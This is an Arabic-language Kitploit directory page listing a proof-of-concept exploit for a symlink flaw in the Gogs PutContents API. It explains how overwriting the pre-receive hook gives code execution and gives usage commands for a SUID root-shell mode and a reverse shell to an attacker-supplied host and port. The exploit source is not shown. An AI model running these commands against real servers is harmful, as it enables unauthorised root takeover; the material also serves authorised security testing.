Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-81110-PoC — التعامل غير السليم مع الروابط الرمزية في واجهة برمجة التطبيقات PutContents في Gogs يسمح بالتنفيذ المحلي للكود. | Kitploit
أدوات/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubbridgeralderson/cve-2025-81110-poc

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-81110-PoC

التعامل غير السليم مع الروابط الرمزية في واجهة برمجة التطبيقات PutContents في Gogs يسمح بالتنفيذ المحلي للكود.

عرض المستودع
41منذ 4 أشهرلم تتم المراجعة بعد

CVE-2025-81110-PoC

معالجة غير صحيحة للروابط الرمزية في واجهة برمجة التطبيقات PutContents في Gogs تسمح بتنفيذ التعليمات البرمجية محليًا.

يحتوي هذا المستودع على استغلال احترافي لثغرة أمنية حرجة في إصدارات Gogs الأقدم من 0.13.0. يستغل الاستغلال عيبًا منطقيًا حيث تفشل واجهة برمجة التطبيقات الخاصة بـ Gogs في التحقق من أنواع الملفات عند تحديث محتويات المستودع. من خلال حقن رابط رمزي يشير إلى خطاف Git من جانب الخادم (pre-receive)، يمكن للمستخدم المصادق عليه استبدال محتوى الخطاف بنص ضار. تؤدي عمليات الدفع اللاحقة إلى تنفيذ هذا النص الضار في سياق المستخدم الذي يشغل خدمة Gogs (عادةً root).

حقن الرابط الرمزي: يدفع المهاجم رابطًا رمزيًا يشير إلى خطافات المستودع الداخلية (مثل /root/gogs-repositories//.git/hooks/pre-receive).

استبدال عبر API: تسمح واجهة برمجة التطبيقات الخاصة بـ Gogs بتحديث محتوى الرابط الرمزي. نظرًا لأن نظام التشغيل يتبع الرابط أثناء عملية الكتابة، يتم استبدال خطاف Git الداخلي.

RCE / تصعيد الامتيازات: يؤدي دفع Git لاحق إلى تشغيل خطاف pre-receive. إذا تم تكوين Gogs مع RUN_USER = root، يحصل المهاجم على تحكم كامل في النظام.

المتطلبات

  • Python 3.x
  • مكتبة requests
  • أداة سطر الأوامر git مثبتة على جهاز المهاجم

الاستخدام

وضع SUID

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

بعد الانتهاء، احصل على صلاحيات root على الهدف:

root@kitploit:~
/tmp/rootbash -p

REVSHELL

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

مرجع الوسائط

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية وتدقيق الأمان المصرح به فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

تنزيل الأداة
Argumentمطلوبالوصف
--urlنعمعنوان URL الأساسي لتثبيت Gogs (مثل http://127.0.0.1:3001).
--userنعماسم مستخدم صالح للمصادقة.
--passنعمكلمة مرور صالحة للمستخدم المحدد.
--modeلاوضع الاستغلال: suid (ينشئ /tmp/rootbash) أو rev (صدفة عكسية).
--lhostلاعنوان IP المحلي لاستدعاء الصدفة العكسية.
--lportلاالمنفذ المحلي لمستمع الصدفة العكسية.